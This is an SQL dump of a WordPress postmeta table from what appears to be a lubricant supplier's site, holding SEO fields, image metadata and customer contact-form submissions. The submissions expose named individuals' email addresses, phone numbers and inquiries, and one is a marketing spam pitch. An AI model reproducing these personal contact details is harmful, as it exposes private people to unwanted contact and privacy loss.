INSERT INTO `wp_postmeta` VALUES (33478, 3753, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (33479, 3753, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (33480, 3753, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (33482, 3753, '_yoast_wpseo_linkdex', '99'); 
INSERT INTO `wp_postmeta` VALUES (33484, 3760, '_edit_lock', '1488375712:2'); 
INSERT INTO `wp_postmeta` VALUES (33485, 3760, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (33486, 3761, '_wp_attached_file', '2017/02/krytox-plant-savings.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33487, 3761, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1133;s:6:"height";i:1255;s:4:"file";s:32:"2017/02/krytox-plant-savings.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"krytox-plant-savings-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"krytox-plant-savings-722x800.jpg";s:5:"width";i:722;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"krytox-plant-savings-768x851.jpg";s:5:"width";i:768;s:6:"height";i:851;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"krytox-plant-savings-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"krytox-plant-savings-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"krytox-plant-savings-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"krytox-plant-savings-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"13";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33489, 3762, '_wp_attached_file', '2017/02/Krytox-PFPE-Lubricant.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33490, 3762, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:33:"2017/02/Krytox-PFPE-Lubricant.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"Krytox-PFPE-Lubricant-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"Krytox-PFPE-Lubricant-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"Krytox-PFPE-Lubricant-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"Krytox-PFPE-Lubricant-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"Krytox-PFPE-Lubricant-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"Krytox-PFPE-Lubricant-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"Krytox-PFPE-Lubricant-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33491, 3760, '_thumbnail_id', '3762'); 
INSERT INTO `wp_postmeta` VALUES (33493, 3760, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (33494, 3760, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (33495, 3760, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (33496, 3760, '_yoast_wpseo_focuskw_text_input', 'PFPE Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (33497, 3760, '_yoast_wpseo_focuskw', 'PFPE Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (33498, 3760, '_yoast_wpseo_title', 'The Power of PFPE Lubricant Selection - Krytox Performance Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (33499, 3760, '_yoast_wpseo_metadesc', 'With the average plant using more than 2,000 bearings – lubrication plays a critical role in plant performance. PFPE Lubricant Krytox can help.'); 
INSERT INTO `wp_postmeta` VALUES (33500, 3760, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (33501, 3760, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (33502, 3760, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (33503, 3764, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33504, 3764, '_seq_num', '376'); 
INSERT INTO `wp_postmeta` VALUES (33505, 3764, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33506, 3764, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33507, 3764, '_field_1', 'Ashley White'); 
INSERT INTO `wp_postmeta` VALUES (33508, 3764, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (33509, 3764, '_field_2', 'ashley.white@wescoair.com'); 
INSERT INTO `wp_postmeta` VALUES (33510, 3764, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (33511, 3764, '_field_3', 'Good morning,\r\n\r\nI would like some information Dry Film RA/IPA-15. What is the shelf life, storage temperature, and manufacturer part number for this product? I would also like to know if this product is sold in 1 quart container. If so, what type of container?\r\n\r\nThank you,\r\n'); 
INSERT INTO `wp_postmeta` VALUES (33512, 3764, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33513, 3764, '_sub_id', '3764'); 
INSERT INTO `wp_postmeta` VALUES (33514, 3765, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (33515, 3765, '_seq_num', '237'); 
INSERT INTO `wp_postmeta` VALUES (33516, 3765, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33517, 3765, '_field_12', 'Ashley White'); 
INSERT INTO `wp_postmeta` VALUES (33518, 3765, '_field_13', 'Wesco Aircraft'); 
INSERT INTO `wp_postmeta` VALUES (33519, 3765, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (33520, 3765, '_field_14', 'ashley.white@wescoair.com'); 
INSERT INTO `wp_postmeta` VALUES (33521, 3765, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (33522, 3765, '_field_16', 'Good morning,\r\n\r\nI would like some information MS-122SD PTFE Release Agent/Dry Lubricant and Flux Remover (MS-725M). What is the shelf life, storage temperature, and manufacturer part number for these products? I would also like to know if the MS-122SD is sold in an 455 g spray can. \r\n'); 
INSERT INTO `wp_postmeta` VALUES (33523, 3765, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (33524, 3765, '_sub_id', '3765'); 
INSERT INTO `wp_postmeta` VALUES (33525, 3766, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33526, 3766, '_seq_num', '377'); 
INSERT INTO `wp_postmeta` VALUES (33527, 3766, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33528, 3766, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33529, 3766, '_field_1', 'Rita'); 
INSERT INTO `wp_postmeta` VALUES (33530, 3766, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (33531, 3766, '_field_2', 'CWC@BPIequip.com'); 
INSERT INTO `wp_postmeta` VALUES (33532, 3766, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (33533, 3766, '_field_3', 'Hello,\nCould I receive a SDS for the MS-530N/532N Contact Re-Nu product?\nThank you,\nRita'); 
INSERT INTO `wp_postmeta` VALUES (33534, 3766, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33535, 3766, '_sub_id', '3766'); 
INSERT INTO `wp_postmeta` VALUES (33537, 3760, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (33538, 3760, '_yoast_wpseo_linkdex', '99'); 
INSERT INTO `wp_postmeta` VALUES (33540, 3753, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (33542, 3744, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (33545, 3726, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (33546, 3767, '_edit_lock', '1488388780:2'); 
INSERT INTO `wp_postmeta` VALUES (33547, 3767, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (33548, 3767, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (33549, 3767, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (33550, 3767, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (33551, 3767, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (33552, 3767, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (33553, 3767, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (33554, 3769, '_wp_attached_file', '2017/03/krytox-considerations.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33555, 3769, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:931;s:6:"height";i:1535;s:4:"file";s:33:"2017/03/krytox-considerations.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"krytox-considerations-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"krytox-considerations-485x800.jpg";s:5:"width";i:485;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"krytox-considerations-768x1266.jpg";s:5:"width";i:768;s:6:"height";i:1266;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"krytox-considerations-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"krytox-considerations-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"krytox-considerations-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"krytox-considerations-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"12";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33556, 3770, '_wp_attached_file', '2017/03/krytox-vs-competitors.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33557, 3770, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2505;s:6:"height";i:1401;s:4:"file";s:33:"2017/03/krytox-vs-competitors.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"krytox-vs-competitors-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"krytox-vs-competitors-800x447.jpg";s:5:"width";i:800;s:6:"height";i:447;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"krytox-vs-competitors-768x430.jpg";s:5:"width";i:768;s:6:"height";i:430;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"krytox-vs-competitors-1600x895.jpg";s:5:"width";i:1600;s:6:"height";i:895;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"krytox-vs-competitors-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"krytox-vs-competitors-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"krytox-vs-competitors-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"krytox-vs-competitors-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"12";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33558, 3771, '_wp_attached_file', '2017/03/krytox-pfpe-performance.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33559, 3771, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:861;s:6:"height";i:461;s:4:"file";s:35:"2017/03/krytox-pfpe-performance.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:35:"krytox-pfpe-performance-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:35:"krytox-pfpe-performance-800x428.jpg";s:5:"width";i:800;s:6:"height";i:428;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"krytox-pfpe-performance-768x411.jpg";s:5:"width";i:768;s:6:"height";i:411;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:35:"krytox-pfpe-performance-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"krytox-pfpe-performance-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"krytox-pfpe-performance-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:35:"krytox-pfpe-performance-510x461.jpg";s:5:"width";i:510;s:6:"height";i:461;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"14";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33560, 3772, '_wp_attached_file', '2017/03/krytox-best-lubricant.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33561, 3772, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:668;s:4:"file";s:33:"2017/03/krytox-best-lubricant.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"krytox-best-lubricant-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"krytox-best-lubricant-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"krytox-best-lubricant-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"krytox-best-lubricant-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"krytox-best-lubricant-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"krytox-best-lubricant-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"krytox-best-lubricant-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33562, 3767, '_thumbnail_id', '3772'); 
INSERT INTO `wp_postmeta` VALUES (33564, 3767, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (33565, 3767, '_yoast_wpseo_focuskw_text_input', 'best lubricant'); 
INSERT INTO `wp_postmeta` VALUES (33566, 3767, '_yoast_wpseo_focuskw', 'best lubricant'); 
INSERT INTO `wp_postmeta` VALUES (33567, 3767, '_yoast_wpseo_title', 'Best Lubricant Analysis | Nothing is as Expensive as Cheap Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (33568, 3767, '_yoast_wpseo_metadesc', 'The best lubricant can reduce downtime and keep maintenance costs under control, in order to drive performance and increase profitability.'); 
INSERT INTO `wp_postmeta` VALUES (33569, 3774, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (33570, 3774, '_seq_num', '238'); 
INSERT INTO `wp_postmeta` VALUES (33571, 3774, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33572, 3774, '_field_12', 'Mike George'); 
INSERT INTO `wp_postmeta` VALUES (33573, 3774, '_field_13', 'C.F. Martin &amp; Co.'); 
INSERT INTO `wp_postmeta` VALUES (33574, 3774, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (33575, 3774, '_field_14', 'mgeorge@martinguitar.com'); 
INSERT INTO `wp_postmeta` VALUES (33576, 3774, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (33577, 3774, '_field_16', 'Hi,\nWould you be able to direct me to any information regarding your spray on dry lube and it&#039;s reaction with glues?\n\nThank you,\nMike'); 
INSERT INTO `wp_postmeta` VALUES (33578, 3774, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (33579, 3774, '_sub_id', '3774'); 
INSERT INTO `wp_postmeta` VALUES (33580, 3775, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33581, 3775, '_seq_num', '378'); 
INSERT INTO `wp_postmeta` VALUES (33582, 3775, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33583, 3775, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33584, 3775, '_field_1', 'Pedro Garcia'); 
INSERT INTO `wp_postmeta` VALUES (33585, 3775, '_field_10', 'Equipssa'); 
INSERT INTO `wp_postmeta` VALUES (33586, 3775, '_field_2', 'pedrogarcia@equipsa.com'); 
INSERT INTO `wp_postmeta` VALUES (33587, 3775, '_field_8', '(305) 592-7610'); 
INSERT INTO `wp_postmeta` VALUES (33588, 3775, '_field_3', 'I have a client in Nicaragua that wants me to be here in the states, the following. Please let me know if you can sell these items to me an how much prices will be.\n15W40....CI4\n25W60\n85W140\nSAE50\n80W90\n'); 
INSERT INTO `wp_postmeta` VALUES (33589, 3775, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33590, 3775, '_sub_id', '3775'); 
INSERT INTO `wp_postmeta` VALUES (33591, 3776, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33592, 3776, '_seq_num', '379'); 
INSERT INTO `wp_postmeta` VALUES (33593, 3776, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33594, 3776, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33595, 3776, '_field_1', 'Brenda Vezorak'); 
INSERT INTO `wp_postmeta` VALUES (33596, 3776, '_field_10', 'NIS'); 
INSERT INTO `wp_postmeta` VALUES (33597, 3776, '_field_2', 'brendav@nistx.com'); 
INSERT INTO `wp_postmeta` VALUES (33598, 3776, '_field_8', '(936) 825-7368'); 
INSERT INTO `wp_postmeta` VALUES (33599, 3776, '_field_3', 'I need to get a resale price and availability for 2 cases of\r\nContact Re-Nu (MS-730).  I would be using a Visa CC to purchase.\r\nThanks\r\nBrenda'); 
INSERT INTO `wp_postmeta` VALUES (33600, 3776, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33601, 3776, '_sub_id', '3776'); 
INSERT INTO `wp_postmeta` VALUES (33603, 3778, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33604, 3778, '_seq_num', '380'); 
INSERT INTO `wp_postmeta` VALUES (33605, 3778, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33606, 3778, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33607, 3778, '_field_1', 'Scarlett Frost'); 
INSERT INTO `wp_postmeta` VALUES (33608, 3778, '_field_10', 'Acute Mark'); 
INSERT INTO `wp_postmeta` VALUES (33609, 3778, '_field_2', 'scarlett@acutemarketingsolutions.com'); 
INSERT INTO `wp_postmeta` VALUES (33610, 3778, '_field_8', '5158616600'); 
INSERT INTO `wp_postmeta` VALUES (33611, 3778, '_field_3', 'Hi, \r\n \r\nThis is just a quick follow up email to check whether you have need of email database for your marketing purposes.\r\n\r\nWe have filtered out few job titles/functions. Please check below the details:\r\n\r\nC-level executives, Manufacturers, owners, Automotive engineers, Electrical engineers, Test Engineer, Applications Engineer, Engineering Director, Engineering Manager, System engineer, Drug Store Owners, Architectures, Builders,  Petroleum Engineers and many more.\r\n\r\nIndustries covered:  Aerospace, Architecture, Automotive, Consumer Products, Corrosion, Energy, Heavy Vehicle, Infrastructure/Construction, Marine, Mass Transit, Medical, Military &amp; Defense, Pipe &amp; Tank, Recreational Vehicle, Sports and Recreation, Transportation.\r\n\r\nKindly revert back with your needs such as Target industry, Target job titles, Target geography. So that we can provide you more details i.e. counts,samples,pricing,etc.\r\n\r\nLook forward to hear from you.\r\n\r\nRegards,\r\n\r\nScarlett Frost\r\nMarketing Manager\r\nAcute Marketing Solutions Inc.'); 
INSERT INTO `wp_postmeta` VALUES (33612, 3778, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33613, 3778, '_sub_id', '3778'); 
INSERT INTO `wp_postmeta` VALUES (33615, 3767, '_yoast_wpseo_linkdex', '99'); 
INSERT INTO `wp_postmeta` VALUES (33616, 3780, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33617, 3780, '_seq_num', '381'); 
INSERT INTO `wp_postmeta` VALUES (33618, 3780, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33619, 3780, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33620, 3780, '_field_1', 'Nathan Van Loon'); 
INSERT INTO `wp_postmeta` VALUES (33621, 3780, '_field_10', 'TE Connectivity/Seacon Bratner'); 
INSERT INTO `wp_postmeta` VALUES (33622, 3780, '_field_2', 'nathan.vanloon@te.com'); 
INSERT INTO `wp_postmeta` VALUES (33623, 3780, '_field_8', '(161) 956-2707'); 
INSERT INTO `wp_postmeta` VALUES (33624, 3780, '_field_3', 'We are hoping to replace a polyurethane and rubber molding mold release compound. We used a two-component compound called HMP 85-1 from Fluid Polymers. I believe it is now discontinued. Do you have any recommendations for us to replace this compound?\r\n\r\nThank you.'); 
INSERT INTO `wp_postmeta` VALUES (33625, 3780, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33626, 3780, '_sub_id', '3780'); 
INSERT INTO `wp_postmeta` VALUES (33627, 3781, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (33628, 3781, '_seq_num', '382'); 
INSERT INTO `wp_postmeta` VALUES (33629, 3781, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33630, 3781, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (33631, 3781, '_field_1', 'Scott Pearce'); 
INSERT INTO `wp_postmeta` VALUES (33632, 3781, '_field_10', 'Pearce Consulting'); 
INSERT INTO `wp_postmeta` VALUES (33633, 3781, '_field_2', 'beeblebrox666@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (33634, 3781, '_field_8', '(610) 701-9185'); 
INSERT INTO `wp_postmeta` VALUES (33635, 3781, '_field_3', 'Gentlemen, I have used your Epoxy 907 system for years. It is an excellent product. (Still mixes up and works just fine after more than 10 years!) I have a need for an Epoxy resin system with different characteristics. My needs are: Room temperature Cure glass filled resin that can handle high temperature (&gt;500°F) for a few seconds and is low viscosity/pour-able. Slow cure time is ok and smooth surface after cure is desireable. A similar product I have used is Stycast 3050 resin with Catalyst 9. The issue with this product is poor surface after cure.(Amine bleedout makes surface sticky unless baked at high temperature.) This is not desired as the application is for bonding small solid rocket motor nozzles and bulkheads. Color of adhesive does not matter. I am looking for a small quantity. 1 Pint or Quart is sufficient. Perhaps an engineering sample.'); 
INSERT INTO `wp_postmeta` VALUES (33636, 3781, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (33637, 3781, '_sub_id', '3781'); 
INSERT INTO `wp_postmeta` VALUES (33638, 3782, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (33639, 3782, '_seq_num', '239'); 
INSERT INTO `wp_postmeta` VALUES (33640, 3782, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (33641, 3782, '_field_12', 'Daniel'); 
INSERT INTO `wp_postmeta` VALUES (33642, 3782, '_field_13', 'Olympus Medical'); 
INSERT INTO `wp_postmeta` VALUES (33643, 3782, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (33644, 3782, '_field_14', 'daniel.teseny@olympusmedical.com'); 
INSERT INTO `wp_postmeta` VALUES (33645, 3782, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (33646, 3782, '_field_16', 'We were notifed that the MS-143H is being discontinued and the MS-143TE. Can you tell me if these are equivelant and provide the MS-143H Product information &quot;sheet&quot;'); 
INSERT INTO `wp_postmeta` VALUES (33647, 3782, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (33648, 3782, '_sub_id', '3782'); 
INSERT INTO `wp_postmeta` VALUES (33649, 3783, '_form_id', '1'); 
